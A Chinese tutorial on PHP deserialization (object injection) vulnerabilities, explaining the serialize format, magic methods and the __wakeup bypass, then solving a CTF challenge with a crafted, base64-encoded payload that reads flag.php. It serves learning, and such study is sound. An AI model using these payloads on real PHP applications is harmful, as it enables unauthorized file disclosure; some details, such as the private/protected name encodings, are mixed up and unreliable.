反序列化漏洞(PHP)
介绍序列化和反序列化
序列化和反序列化:大型网站中类创建的对象多的时候会占用大量空间,序列化就是将这些对象转换为字符串来保存,当用到的时候再转换为对象,由字符串重新转换为对象的时候用到的就是反序列化。
例:
$a = new A();输出结果:
$se_a = serialize($a);
echo $se_a;
?>
O:1:"A":1:{s:1:"a"; i:1; }格式说明:O:“类的名字的字节数“:“类的名字“:“对象中几个参数“:{“第一个参数名字的类型“:“第一个参数名字所占字节数”:“第一个参数名字”;“第二个参数名字的类型“:“第二个参数名字所占字节数”:“第二个参数名字”;········;“第n个参数名字的类型“:“第n个参数名字所占字节数”:“第n个参数名字”;}
以下以类的名字为“A”,参数名字为a举例子:
若参数类型为public,则参数名字的类型用字母 “s”表示,整体表示为:(s:1:"a"; );
若参数类型为private,则参数名字的类型用字母“s”表示,整体表示为:(s:4:"\0*\0a"; );
若参数类型为protected,则参数名字的类型用字母“S”表示,整体表示为:(S:2:"\0Aa\0"; ),参数前面加类的名字。(\0是表示0的ASCII码)
常见的表示类型的字符:
O:类
a:数组(array)
b:boolean
i:整型
s:字符串
N:NULL
d:double,浮点型
挖掘反序列化漏洞需要注意的常用魔法函数 反序列化漏洞也被成为对象注入。
__construct():当一个对象创建时被调用。
__destruct():当一个对象销毁时或者php代码执行完毕时被调用。
__toString():当一个对象被当作一个字符串使用
__sleep():在对象在被序列化之前运行
__wakeup():将在序列化之后立即被调用
__weakup()函数绕过方法:
用上面的例子,正常输出O:1:"A":1:{s:1:"a"; i:1; },这里变量数量只有一个,若改成变量数量为两个则可以绕过__weakup函数。
O:1:"A":2:{s:1:"a"; i:1; }
原因是php底层代码bug:简单来说,如果对象属性检查异常,那么Purrase_nested_data()将会返回0,且不调用WAKEUP()方法,但是在这之前对象和它的属性已经被创建,紧接着对象将被破坏,从而执行DESTRUCT()函数,于是导致了漏洞。
文章图片
实战一道CTF题
class SoFun{这题最后输出答案的语句应该是析构函数里的这句:show_source(dirname (__FILE__).'/'.$this ->file);
protected $file='index.php';
function __destruct(){//定义析构函数,当创建的对象被销毁时自动执行
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false &&strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
elsedie('Wrong filename.');
}}
function __wakeup(){ $this-> file='index.php'; }
public function __toString(){return '' ; }}
if (!isset($_GET['file'])){ show_source('index.php'); }
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file ); }
?>#
可是代码最后执行反序列化的时候执行了__weakup()函数,所以就执行了__weakup()函数中的this->file='index',代码执行结束的时候,析构函数中show_source(dirname (__FILE__).'/'.$this ->file); 就输出的为index..php的代码了。所以用绕过__weakup()函数的方法来不让this->file这个变量变成index.php。
1、代码审计
审计代码,可以发现要得到KEY,思路如下:
1、源码最后提示,KEY在flag.php里面;
2、注意到__destruct魔术方法中,有这么一段代码,将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file),这个是解题关键;
3、若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);
4、上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;
5、总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。
2、PHP反序列化对象注入漏洞
上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。
简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。举个栗子,比如有个Student类,里面有个参数为name。
实际情况:O:7:”Student”:1:{S:4:”name”; s:8:”zhangsan”; }
Payload:O:7:”Student”:2:{S:4:”name”; s:8:”zhangsan”; }Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。
3、CTF Payload
明确了这些之后,就可以构造出Payload了,需反序列化的对象为:
O:5:”SoFun”:2:{S:7:”\00*\00file”; s:8:”flag.php”; }
O:5:”SoFun” 指的是 类:5个字符:SoFun
:2:指的是 有两个对象
S:7:”\00*\00file”指的是有个属性,有7个字符,名为\00*\00file
s:8:”flag.php”指的是属性值,有8个字符,值为flag.php
【反序列化漏洞(PHP)】值得注意的是,file是protected属性,因此需要用\00*\00来表示,\00代表ascii为0的值。另外,还需要经过Base64编码,结果为:
Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==
文章图片
参考链接:https://www.freebuf.com/news/172507.html
推荐阅读
- CVE-2020-16898|CVE-2020-16898 TCP/IP远程代码执行漏洞
- 2018-02-06第三天|2018-02-06第三天 不能再了,反思到位就差改变
- 吃了早餐,反而容易饿(为什么?)
- 难道你仅会钻规则的漏洞吗()
- 父母越不讲道理,孩子反而越优秀!说的是你吗()
- 改变自己,先从自我反思开始
- leetcode|leetcode 92. 反转链表 II
- 那些反串过的艺人-最是美色如醉人
- 反脆弱性(工作越稳定,人生越脆弱!)
- 五一反思